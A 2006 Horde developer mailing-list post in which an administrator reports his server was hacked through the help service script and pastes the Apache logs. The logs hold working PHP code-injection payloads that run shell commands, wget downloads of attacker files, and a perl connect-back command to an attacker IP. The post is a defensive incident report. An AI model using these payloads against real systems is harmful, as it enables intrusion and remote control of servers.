[dev] [SECURITY] Horde was used to hack my system
Roel Gloudemans
roel at gloudemans.info
Wed Apr 12 08:06:45 PDT 2006
I think there is a problem in /horde/services/help/index.php. This
script was used to dump some files in my temp dir and to start an irc
server. The logs are below. I haven't looked at the code yet. I'm
scanning my system first.
Cheers,
Roel.
------------------ APRIL 09
----- Apache access LOG -------
82.107.175.186 - - [09/Apr/2006:13:45:56 +0200] "GET
//horde//services/help/?show=about&module=;%22.passthru(%22id;df%20-h;quota%20-v;uname%20-a;pwd;ls%20-la;w%22);'. HTTP/1.1" 200 8647 "-" "Nozilla/P.N (Just for IDS
woring)"
82.107.175.186 - - [09/Apr/2006:13:46:01 +0200] "GET
//horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22supfra.altervista.org%22.chr(47).%22tlsd.txt;ls%20-la%22);'. HTTP/1.1" 200 35733 "-" "Nozilla/P.N (Just for IDS
woring)"
82.107.175.186 - - [09/Apr/2006:15:08:37 +0200] "GET
//horde//services/help/?show=about&module=;%22.passthru(%22id;df%20-h;quota%20-v;uname%20-a;pwd;ls%20-lia;w%22);'. HTTP/1.1" 200 8664 "-" "Nozilla/P.N (Just for IDS
woring)"
82.107.175.186 - - [09/Apr/2006:15:08:46 +0200] "GET
//horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22supfra.altervista.org%22.chr(47).%22tlsd.txt;ls%20-lia%22);'. HTTP/1.1" 200 39398 "-" "Nozilla/P.N (Just for IDS
woring)"
82.107.175.186 - - [09/Apr/2006:15:14:21 +0200] "GET
//horde//services/help/?show=about&module=;%22.passthru(%22id;df%20-h;quota%20-v;uname%20-a;pwd;ls%20-lia;w%22);'. HTTP/1.1" 200 8664 "-" "Nozilla/P.N (Just for IDS
woring)"
82.107.175.186 - - [09/Apr/2006:15:14:30 +0200] "GET
//horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22supfra.altervista.org%22.chr(47).%22tlsd.txt;ls%20-lia%22);'. HTTP/1.1" 200 39468 "-" "Nozilla/P.N (Just for IDS
woring)"
----- APACHE error log ---------
df: `/var/named/chroot/proc': Permission denied
--13:46:01-- http://supfra.altervista.org/tlsd.txt
=> `tlsd.txt'
Resolving supfra.altervista.org... 66.98.138.46
Connecting to supfra.altervista.org|66.98.138.46|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,307 (11K) [text/plain]
0K .......... . 100% 34.79 KB/s
13:46:02 (34.79 KB/s) - `tlsd.txt' saved [11307/11307]
df: `/var/named/chroot/proc': Toegang geweigerd
--15:08:46-- http://supfra.altervista.org/tlsd.txt
=> `tlsd.txt.1'
Herleiden van supfra.altervista.org... 66.98.138.46
Verbinding maken met supfra.altervista.org|66.98.138.46|:80... verbonden.
HTTP-verzoek is verzonden, wachten op antwoord... 200 OK
Lengte: 11,307 (11K) [text/plain]
0K .......... . 100% 43.77 KB/s
15:08:47 (43.77 KB/s) - 'tlsd.txt.1' opgeslagen [11307/11307]
df: `/var/named/chroot/proc': Toegang geweigerd
--15:14:30-- http://supfra.altervista.org/tlsd.txt
=> `tlsd.txt.2'
Herleiden van supfra.altervista.org... 66.98.138.46
Verbinding maken met supfra.altervista.org|66.98.138.46|:80... verbonden.
HTTP-verzoek is verzonden, wachten op antwoord... 200 OK
Lengte: 11,307 (11K) [text/plain]
0K .......... . 100% 78.07 KB/s
15:14:30 (78.07 KB/s) - 'tlsd.txt.2' opgeslagen [11307/11307]
------- APRIL 11
------------ Apache access log---------------
12.17.190.27 - - [11/Apr/2006:02:33:23 +0200] "GET
//horde//services/help/?show=about&module=;%22.passthru(%22id%22);'.
HTTP/1.1" 200 8013 "-" "Nozilla/P.N (Just for IDS woring)"
12.17.190.27 - - [11/Apr/2006:02:33:28 +0200] "GET
//horde//services/help/?show=about&module=;%22.passthru(%22wget%22);'.
HTTP/1.1" 200 8062 "-" "Nozilla/P.N (Just for IDS woring)"
193.109.122.56 - - [11/Apr/2006:02:35:22 +0200] "CONNECT
193.109.122.67:6668 HTTP/1.0" 200 941 "-" "pxyscand/2.1"
12.17.190.27 - - [11/Apr/2006:02:33:37 +0200] "GET
//horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22var%22.chr(47).%22tmp;wget%20www.squaq.go.ro%22.chr(47).%22cb;perl%20cb%2012.17.190.27%2065000%22);'. HTTP/1.1" 200 7964 "-" "Nozilla/P.N (Just for IDS
woring)"
12.17.190.27 - - [11/Apr/2006:02:51:34 +0200] "GET
//horde//services/help/?show=about&module=;%22.passthru(%22id%22);'.
HTTP/1.1" 200 8021 "-" "Nozilla/P.N (Just for IDS woring)"
12.17.190.27 - - [11/Apr/2006:02:51:38 +0200] "GET
//horde//services/help/?show=about&module=;%22.passthru(%22wget%22);'.
HTTP/1.1" 200 8061 "-" "Nozilla/P.N (Just for IDS woring)"
12.17.190.27 - - [11/Apr/2006:02:51:41 +0200] "GET
//horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22var%22.chr(47).%22tmp;wget%20www.squaq.go.ro%22.chr(47).%22cb;perl%20cb%2012.17.190.27%2065000%22);'. HTTP/1.1" 200 7973 "-" "Nozilla/P.N (Just for IDS
woring)"
12.17.190.27 - - [11/Apr/2006:02:51:48 +0200] "GET
//horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22var%22.chr(47).%22tmp;wget%20www.squaq.go.ro%22.chr(47).%22cb;perl%20cb%2012.17.190.27%2065000%22);'. HTTP/1.1" 200 7973 "-" "Nozilla/P.N (Just for IDS
woring)"
------- Apache ERROR LOG ------------------
--02:33:38-- http://www.squaq.go.ro/cb
=> `cb'
Herleiden van www.squaq.go.ro... 81.196.20.134
Verbinding maken met www.squaq.go.ro|81.196.20.134|:80... verbonden.
HTTP-verzoek is verzonden, wachten op antwoord... 200 OK
Lengte: 356 [text/plain]
0K 100% 30.86 MB/s
02:33:38 (30.86 MB/s) - 'cb' opgeslagen [356/356]
--02:51:42-- http://www.squaq.go.ro/cb
=> `cb.1'
Resolving www.squaq.go.ro... 81.196.20.134
Connecting to www.squaq.go.ro|81.196.20.134|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 356 [text/plain]
0K 100% 30.86 MB/s
02:51:42 (30.86 MB/s) - `cb.1' saved [356/356]
--02:51:48-- http://www.squaq.go.ro/cb
=> `cb.2'
Resolving www.squaq.go.ro... 81.196.20.134
Connecting to www.squaq.go.ro|81.196.20.134|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 356 [text/plain]
0K 100% 28.29 MB/s
02:51:48 (28.29 MB/s) - `cb.2' saved [356/356]
More information about the dev
mailing list